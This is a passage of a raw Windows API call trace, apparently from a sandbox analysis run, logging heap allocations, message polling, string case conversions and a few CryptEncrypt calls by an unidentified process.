RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0265.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.133] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0265.134] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0265.134] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.135] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.135] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0265.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.136] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.136] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.136] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.136] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.136] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0265.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.137] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.137] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.141] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0265.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.141] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0265.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.141] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.141] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.142] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.142] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.142] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.142] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0265.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.142] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.142] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.142] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.143] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.143] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.143] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.143] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.143] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.143] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.143] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.143] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.143] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.143] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.143] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.143] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.143] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.143] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.144] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.144] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.144] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.144] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.145] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0265.145] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.145] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0265.146] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.146] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.146] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.146] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.146] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.146] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.146] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0265.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.146] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0265.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0265.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.147] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.147] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.147] 